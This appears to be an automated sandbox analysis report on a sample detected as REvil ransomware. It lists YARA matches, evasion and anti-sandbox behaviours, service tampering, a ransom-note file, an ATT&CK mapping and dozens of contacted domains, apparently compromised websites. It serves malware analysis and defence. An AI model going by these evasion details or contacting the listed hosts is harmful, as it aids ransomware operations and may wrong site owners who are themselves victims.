          Source: tS9P6wPz9x.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: tS9P6wPz9x.exe, type: SAMPLEMatched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
          Source: 00000000.00000000.203907016.00000000009C1000.00000020.00020000.sdmp, type: MEMORYMatched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
          Source: 00000000.00000002.596611084.00000000009C1000.00000020.00020000.sdmp, type: MEMORYMatched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
          Source: 0.2.tS9P6wPz9x.exe.9c0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
          Source: 0.0.tS9P6wPz9x.exe.9c0000.0.unpack, type: UNPACKEDPEMatched rule: MAL_RANSOM_REvil_Oct20_1 date = 2020-10-13, hash4 = fc26288df74aa8046b4761f8478c52819e0fca478c1ab674da7e1d24e1cfa501, hash3 = f6857748c050655fb3c2192b52a3b0915f3f3708cd0a59bbf641d7dd722a804d, hash2 = f66027faea8c9e0ff29a31641e186cbed7073b52b43933ba36d61e8f6bce1ab5, hash1 = 5966c25dc1abcec9d8603b97919db57aac019e5358ee413957927d3c1790b7f4, author = Florian Roth, description = Detects REvil ransomware, reference = Internal Research
          Source: classification engineClassification label: mal100.rans.evad.winEXE@2/2@46/38
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C4C0D GetDriveTypeW,GetDiskFreeSpaceExW,0_2_009C4C0D
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C53A4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_009C53A4
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeMutant created: \Sessions\1\BaseNamedObjects\Global\396F07EB-C2F1-6216-0EC9-D4DA87185DBF
          Source: tS9P6wPz9x.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\CIMV2 : SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA &apos;Win32_Process&apos;
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: tS9P6wPz9x.exe, 00000000.00000003.368921886.0000000000BBC000.00000004.00000001.sdmpBinary or memory string: SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'k;R
          Source: tS9P6wPz9x.exe, 00000000.00000003.430958851.0000000000BBC000.00000004.00000001.sdmpBinary or memory string: SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA 'Win32_Process'b;S
          Source: tS9P6wPz9x.exeVirustotal: Detection: 75%
          Source: unknownProcess created: C:\Users\user\Desktop\tS9P6wPz9x.exe 'C:\Users\user\Desktop\tS9P6wPz9x.exe'
          Source: unknownProcess created: C:\Windows\System32\wbem\unsecapp.exe C:\Windows\system32\wbem\unsecapp.exe -Embedding
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
          Source: tS9P6wPz9x.exeStatic PE information: section name: .cfg
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile created: C:\4wfaj7427w-readme.txtJump to behavior

          Malware Analysis System Evasion:

          barindex
          Contains functionality to detect sleep reduction / modificationsShow sources
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C59070_2_009C5907
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_0-5168
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C585D rdtsc 0_2_009C585D
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_009C3B8E
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeWindow / User API: threadDelayed 9999Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exe TID: 2592Thread sleep count: 9999 > 30Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C761A FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_009C761A
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C5370 GetSystemInfo,0_2_009C5370
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\NULLJump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\manifest.jsonJump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\_platform_specificJump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\_platform_specific\win_x64Jump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\_platform_specific\NULLJump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeFile opened: C:\Program Files\Google\Chrome\Application\85.0.4183.121\WidevineCdm\LICENSEJump to behavior
          Source: tS9P6wPz9x.exe, 00000000.00000003.459057587.0000000000C10000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW1
          Source: tS9P6wPz9x.exe, 00000000.00000003.459057587.0000000000C10000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: tS9P6wPz9x.exe, 00000000.00000002.596864356.0000000000B4A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW0B
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeAPI call chain: ExitProcess graph end nodegraph_0-4252
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C585D rdtsc 0_2_009C585D
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C5387 mov ecx, dword ptr fs:[00000030h]0_2_009C5387
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C4FB9 mov eax, dword ptr fs:[00000030h]0_2_009C4FB9
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C47AB HeapCreate,GetProcessHeap,0_2_009C47AB
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: OpenProcess,QueryFullProcessImageNameW,PathFindFileNameW, svchost.exe0_2_009C4964
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C4A20 AllocateAndInitializeSid,SetEntriesInAclW,SetNamedSecurityInfoW,0_2_009C4A20
          Source: tS9P6wPz9x.exe, 00000000.00000002.599162510.00000000010D0000.00000002.00000001.sdmp, unsecapp.exe, 00000015.00000002.597707060.0000025BF3250000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: tS9P6wPz9x.exe, 00000000.00000002.599162510.00000000010D0000.00000002.00000001.sdmp, unsecapp.exe, 00000015.00000002.597707060.0000025BF3250000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: tS9P6wPz9x.exe, 00000000.00000002.599162510.00000000010D0000.00000002.00000001.sdmp, unsecapp.exe, 00000015.00000002.597707060.0000025BF3250000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: tS9P6wPz9x.exe, 00000000.00000002.599162510.00000000010D0000.00000002.00000001.sdmp, unsecapp.exe, 00000015.00000002.597707060.0000025BF3250000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C4B58 cpuid 0_2_009C4B58
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C505F GetUserNameW,0_2_009C505F

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Replication Through Removable Media1Windows Management Instrumentation1Windows Service1Windows Service1Virtualization/Sandbox Evasion1Input Capture21Security Software Discovery121Replication Through Removable Media1Input Capture21Exfiltration Over Other Network MediumEncrypted Channel22Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationDefacement1
          Default AccountsService Execution1Boot or Logon Initialization ScriptsProcess Injection12Process Injection12LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsNative API1Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerProcess Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProxy1SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsPeripheral Device Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsAccount Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Service Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowFile and Directory Discovery2Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingSystem Information Discovery25Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          tS9P6wPz9x.exe76%VirustotalBrowse
          tS9P6wPz9x.exe100%AviraTR/Crypt.XPACK.Gen
          tS9P6wPz9x.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.0.tS9P6wPz9x.exe.9c0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.tS9P6wPz9x.exe.9c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          theduke.de2%VirustotalBrowse
          www.trulynolen.co.uk0%VirustotalBrowse
          365questions.org6%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://latribuessentielle.com/0%Avira URL Cloudsafe
          https://youbysia.com.au/by-laser-treatment/body-toning/0%Avira URL Cloudsafe
          https://www.365questions.org/wp-content/uploads/2019/06/cropped-favicon365-32x32.png0%Avira URL Cloudsafe
          https://digivod.de/wp-content/plugins/bst-dsgvo-cookie/includes/css/bst-mesage.css?ver=5.6.10%Avira URL Cloudsafe
          https://www.365questions.org/?s=0%Avira URL Cloudsafe
          https://youbysia.com.au/rosacea-treatment/0%Avira URL Cloudsafe
          https://www.binder-buerotechnik.at/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp0%Avira URL Cloudsafe
          https://truenyc.co:443/static/image/gtkbwaiygsdn.jpg0%Avira URL Cloudsafe
          https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/images/instagram.png0%Avira URL Cloudsafe
          https://youbysia.com.au/wp-content/uplo0%Avira URL Cloudsafe
          https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/css/owl.theme.default.min.css0%Avira URL Cloudsafe
          https://thewellnessmimi.com/content/images/oxvcjy.jpg0%Avira URL Cloudsafe
          http://decoder.re/0%Avira URL Cloudsafe
          https://idemblogs.com/0%Avira URL Cloudsafe
          https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/favicon/favicon.png0%Avira URL Cloudsafe
          https://withahmed.com/uploads/game/snzazo.jpg0%Avira URL Cloudsafe
          https://you-bysia.com.au/uploads/graphic/femvpu.png0%Avira URL Cloudsafe
          https://youbysia.com.au/wp-content/themes/youbysia/css/youtubecss.css?ver=5.4.40%Avira URL Cloudsafe
          https://manifestinglab.com/news/tmp/pakc.jpgC0%Avira URL Cloudsafe
          https://youbysia.com.au/by-laser-treatment/skin-treatments/signature-sonic-facial/0%Avira URL Cloudsafe
          https://tulsawaterheaterinstallation.com/news/image/rf.jpg0%Avira URL Cloudsafe
          https://youbysia.com.au/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fyoubysia.com.au%2F&#038;format=xm0%Avira URL Cloudsafe
          https://kmbshipping.co.uk/admin/pics/xukxqlujcu.gif0%Avira URL Cloudsafe
          http://cps.letsencrypt.org00%URL Reputationsafe
          http://cps.letsencrypt.org00%URL Reputationsafe
          http://cps.letsencrypt.org00%URL Reputationsafe
          https://www.asgestion.com/comments/feed/0%Avira URL Cloudsafe
          https://huehnerauge-entfernen.de/wp-content/themes/rainforest/style.css?ver=5.6.10%Avira URL Cloudsafe
          https://truenyc.co/feed/0%Avira URL Cloudsafe
          http://zerossl.crt.sectigo.com/ZeroSSLRSADomainSecureSiteCA.crt00%Avira URL Cloudsafe
          https://youbysia.com.au/by-laser-treatment/laser-treatment/laser-hair-removal/0%Avira URL Cloudsafe
          https://youbysia.com.au/wp-content/uploads/2020/11/Coz-beauty-magazine.png0%Avira URL Cloudsafe
          https://narcert.com/comments/feed/0%Avira URL Cloudsafe
          https://youbysia.com.au/contact-us/laser-skin-clinic-sydney-cbd/0%Avira URL Cloudsafe
          https://www.365questions.org/wp-content/plugins/cleantalk-spam-protect/js/cleantalk_nocache.min.js?v0%Avira URL Cloudsafe
          https://youbysia.com.au/acne-blackheads-breakout/0%Avira URL Cloudsafe
          https://youbysia.com.au/by-laser-treatment/laser-treatment/laser-perfecting-lift/0%Avira URL Cloudsafe
          https://youbysia.com.au/wp-content/themes/youbysia/js/jquery.min.js?ver=10%Avira URL Cloudsafe
          https://manifestinglab.com:443/news/tmp/pakc.jpg0%Avira URL Cloudsafe
          https://latribuessentielle.com/?s=0%Avira URL Cloudsafe
          https://www.binder-buerotechnik.at/wp-content/plugins/LayerSlider/static/js/greensock.js?ver=1.11.80%Avira URL Cloudsafe
          http://staging.you-bysia.com.au/about-us/#our-team0%Avira URL Cloudsafe
          https://narcert.com/uploads/image/burgajaobu.pngifh0%Avira URL Cloudsafe
          https://youbysia.com.au/by-skin-condition/dry-dehydrated-skin/0%Avira URL Cloudsafe
          https://you-by-sia.myshopify.com/products/starter-pack0%Avira URL Cloudsafe
          https://www.cosbeauty.com.au/magazines/cosbeauty-magazine-88/0%Avira URL Cloudsafe
          https://www.trulynolen.co.uk/resources/truly-nolen-og.jpg0%Avira URL Cloudsafe
          https://youbysia.com.au/wp-content/uploads/2020/09/Sia-Hendry-podcast-LAser-Facial-Treatments.jpg0%Avira URL Cloudsafe
          https://youbysia.com.au/wp-content/uploads/2020/07/1.jpg0%Avira URL Cloudsafe
          http://r3.o.lencr.org0%Avira URL Cloudsafe
          https://youbysia.com.au/by-laser-treatment/skin-treatments/inside-out-peel/0%Avira URL Cloudsafe
          https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/css/special-slider.css0%Avira URL Cloudsafe
          https://www.365questions.org/wp-content/plugins/cleantalk-spam-protect/js/apbct-public.min.js?ver=5.0%Avira URL Cloudsafe
          https://menexa4papers.trade/0%Avira URL Cloudsafe
          https://www.binder-buerotechnik.at/wp-content/plugins/cookie-notice/css/front.min.css?ver=5.4.40%Avira URL Cloudsafe
          https://youbysia.com.au0%Avira URL Cloudsafe
          https://youbysia.com.au/promotion0%Avira URL Cloudsafe
          https://youbysia.com.au/wp-content/uploads/2020/07/afterpay.png0%Avira URL Cloudsafe
          https://youbysia.com.au/by-skin-condition/unwanted-hair/0%Avira URL Cloudsafe
          https://bbsmobler.se/W:S0%Avira URL Cloudsafe
          https://dontpassthepepper.com/wp-content/tmp/mitn.jpgt0%Avira URL Cloudsafe
          https://bbylegacy.com/0%Avira URL Cloudsafe
          https://you-by-sia.myshopify.com/collections/cleansers0%Avira URL Cloudsafe
          https://you-bysia.com.au:443/uploads/graphic/femvpu.png0%Avira URL Cloudsafe
          https://youbysia.com.au/wp-content/themes/youbysia/css/bootstrap.min.css?ver=5.4.40%Avira URL Cloudsafe
          https://digivod.de/wp-includes/css/dist/block-library/style.min.css?ver=5.6.10%Avira URL Cloudsafe
          https://narcert.com0%Avira URL Cloudsafe
          https://youbysia.com.au/wp-content/uploads/2020/06/1.png0%Avira URL Cloudsafe
          https://www.365questions.org/wp-json/0%Avira URL Cloudsafe
          https://www.maratonaclubedeportugal.com/wp-includes/css/dist/block-library/style.min.css0%Avira URL Cloudsafe
          https://huehnerauge-entfernen.de/comments/feed/0%Avira URL Cloudsafe
          https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/js/special-slider.js0%Avira URL Cloudsafe
          https://365questions.org/0%Avira URL Cloudsafe
          https://www.365questions.org/wp-content/uploads/2019/06/cropped-favicon365-180x180.png0%Avira URL Cloudsafe
          https://youbysia.com.au/by-treatment/skin-treatments/0%Avira URL Cloudsafe
          https://secureservercdn.net0%Avira URL Cloudsafe
          https://huehnerauge-entfernen.de/0%Avira URL Cloudsafe
          https://www.binder-buerotechnik.at/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/0%Avira URL Cloudsafe
          https://www.365questions.org/wp-content/uploads/2019/06/cropped-favicon365-270x270.png0%Avira URL Cloudsafe
          https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/fonts/avenir/style.css0%Avira URL Cloudsafe
          https://digivod.de/feed/0%Avira URL Cloudsafe
          https://narcert.com/feed/0%Avira URL Cloudsafe
          https://youbysia.com.au/body-toning/0%Avira URL Cloudsafe
          https://bbsmobler.se:443/static/assets/ugdl.png0%Avira URL Cloudsafe
          https://youbysia.com.au/wp-content/themes/youbysia/css/owl.carousel.min.css?ver=5.4.40%Avira URL Cloudsafe
          https://huehnerauge-entfernen.de/wp-content/plugins/tablepress/css/default.min.css?ver=1.120%Avira URL Cloudsafe
          https://nsec.se/data/image/od.png0%Avira URL Cloudsafe
          https://youbysia.com.au/by-skin-condition/stretch-marks-removal/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          theduke.de
          		94.16.115.81
          		truetrueunknown
          www.trulynolen.co.uk
          		77.72.5.145
          		truefalseunknown
          365questions.org
          		185.98.131.150
          		truetrueunknown
          digivod.de
          		159.69.118.212
          		truetrue
            		unknown
            kmbshipping.co.uk
            		85.119.82.125
            		truetrue
              		unknown
              maratonaclubedeportugal.com
              		85.234.145.174
              		truetrue
                		unknown
                mediaacademy-iraq.org
                		144.76.225.204
                		truetrue
                  		unknown
                  manifestinglab.com
                  		35.221.46.9
                  		truetrue
                    		unknown
                    thewellnessmimi.com
                    		142.93.110.250
                    		truetrue
                      		unknown
                      latribuessentielle.com
                      		188.165.53.185
                      		truetrue
                        		unknown
                        daklesa.de
                        		178.250.15.192
                        		truetrue
                          		unknown
                          aarvorg.com
                          		184.168.131.241
                          		truetrue
                            		unknown
                            withahmed.com
                            		104.21.78.13
                            		truetrue
                              		unknown
                              humancondition.com
                              		104.26.13.9
                              		truefalse
                                		high
                                pierrehale.com
                                		155.133.142.13
                                		truetrue
                                  		unknown
                                  bigbaguettes.eu
                                  		89.46.91.28
                                  		truetrue
                                    		unknown
                                    idemblogs.com
                                    		91.121.58.131
                                    		truetrue
                                      		unknown
                                      trulynolen.co.uk
                                      		77.72.5.145
                                      		truetrue
                                        		unknown
                                        testcoreprohealthuk.com
                                        		184.175.106.113
                                        		truetrue
                                          		unknown
                                          lb.wordpress.com
                                          		192.0.78.12
                                          		truefalse
                                            		high
                                            dontpassthepepper.com
                                            		74.220.215.94
                                            		truetrue
                                              		unknown
                                              www.kmbshipping.co.uk
                                              		85.119.82.125
                                              		truefalse
                                                		unknown
                                                nsec.se
                                                		13.74.136.93
                                                		truetrue
                                                  		unknown
                                                  bargningavesta.se
                                                  		104.21.9.188
                                                  		truetrue
                                                    		unknown
                                                    you-bysia.com.au
                                                    		116.90.53.15
                                                    		truetrue
                                                      		unknown
                                                      stacyloeb.com
                                                      		198.12.145.239
                                                      		truetrue
                                                        		unknown
                                                        youbysia.com.au
                                                        		116.90.53.15
                                                        		truefalse
                                                          		unknown
                                                          brandl-blumen.de
                                                          		172.67.222.33
                                                          		truetrue
                                                            		unknown
                                                            baylegacy.com
                                                            		66.155.35.240
                                                            		truetrue
                                                              		unknown
                                                              wien-mitte.co.at
                                                              		136.243.147.81
                                                              		truetrue
                                                                		unknown
                                                                narcert.com
                                                                		166.62.110.232
                                                                		truetrue
                                                                  		unknown
                                                                  n1-headache.com
                                                                  		79.137.75.185
                                                                  		truetrue
                                                                    		unknown
                                                                    summitmarketingstrategies.com
                                                                    		91.195.240.117
                                                                    		truetrue
                                                                      		unknown
                                                                      huehnerauge-entfernen.de
                                                                      		46.30.215.215
                                                                      		truetrue
                                                                        		unknown
                                                                        binder-buerotechnik.at
                                                                        		87.230.41.243
                                                                        		truetrue
                                                                          		unknown
                                                                          bxdf.info
                                                                          		185.107.227.241
                                                                          		truetrue
                                                                            		unknown
                                                                            gemeentehetkompas.nl
                                                                            		52.29.252.113
                                                                            		truetrue
                                                                              		unknown
                                                                              transportesycementoshidalgo.es
                                                                              		151.139.128.10
                                                                              		truetrue
                                                                                		unknown
                                                                                bbsmobler.se
                                                                                		91.201.60.54
                                                                                		truetrue
                                                                                  		unknown
                                                                                  asgestion.com
                                                                                  		185.2.4.64
                                                                                  		truetrue
                                                                                    		unknown
                                                                                    truenyc.co
                                                                                    		83.166.155.153
                                                                                    		truetrue
                                                                                      		unknown
                                                                                      ikads.org
                                                                                      		142.93.110.250
                                                                                      		truetrue
                                                                                        		unknown
                                                                                        havecamerawilltravel2017.wordpress.com
                                                                                        		unknown
                                                                                        		unknownfalse
                                                                                          		high
                                                                                          tulsawaterheaterinstallation.com
                                                                                          		unknown
                                                                                          		unknowntrue
                                                                                            		unknown
                                                                                            12starhd.online
                                                                                            		unknown
                                                                                            		unknowntrue
                                                                                              		unknown
                                                                                              www.maratonaclubedeportugal.com
                                                                                              		unknown
                                                                                              		unknownfalse
                                                                                                		unknown
                                                                                                conexa4papers.trade
                                                                                                		unknown
                                                                                                		unknowntrue
                                                                                                  		unknown

                                                                                                  URLs from Memory and Binaries

                                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                                  https://latribuessentielle.com/tS9P6wPz9x.exe, 00000000.00000003.487569474.0000000000BED000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://www.monsterinsights.com/tS9P6wPz9x.exe, 00000000.00000003.515240536.00000000038F6000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.instagram.com/youbysia/tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://youbysia.com.au/by-laser-treatment/body-toning/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://www.365questions.org/wp-content/uploads/2019/06/cropped-favicon365-32x32.pngtS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://digivod.de/wp-content/plugins/bst-dsgvo-cookie/includes/css/bst-mesage.css?ver=5.6.1tS9P6wPz9x.exe, 00000000.00000003.515274231.00000000038C1000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://www.365questions.org/?s=tS9P6wPz9x.exe, 00000000.00000003.508365201.00000000038EA000.00000004.00000001.sdmptrue
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://youbysia.com.au/rosacea-treatment/tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://www.binder-buerotechnik.at/wp-includes/js/jquery/jquery.js?ver=1.12.4-wptS9P6wPz9x.exe, 00000000.00000003.458962661.0000000000BCF000.00000004.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://mailchi.mp/1cfeb1a8f2e4/this-offer-is-lit-30-off-when-your-a-luxe-vip-membertS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpfalse
                                                                                                        		high
                                                                                                        https://truenyc.co:443/static/image/gtkbwaiygsdn.jpgtS9P6wPz9x.exe, 00000000.00000003.508481116.0000000000BEF000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://www.maratonaclubedeportugal.com/wp-content/themes/maratonas/images/instagram.pngtS9P6wPz9x.exe, 00000000.00000003.492431696.00000000038CC000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
                                                                                                        https://youbysia.com.au/wp-content/uplotS9P6wPz9x.exe, 00000000.00000002.602709705.00000000038EA000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        		unknown
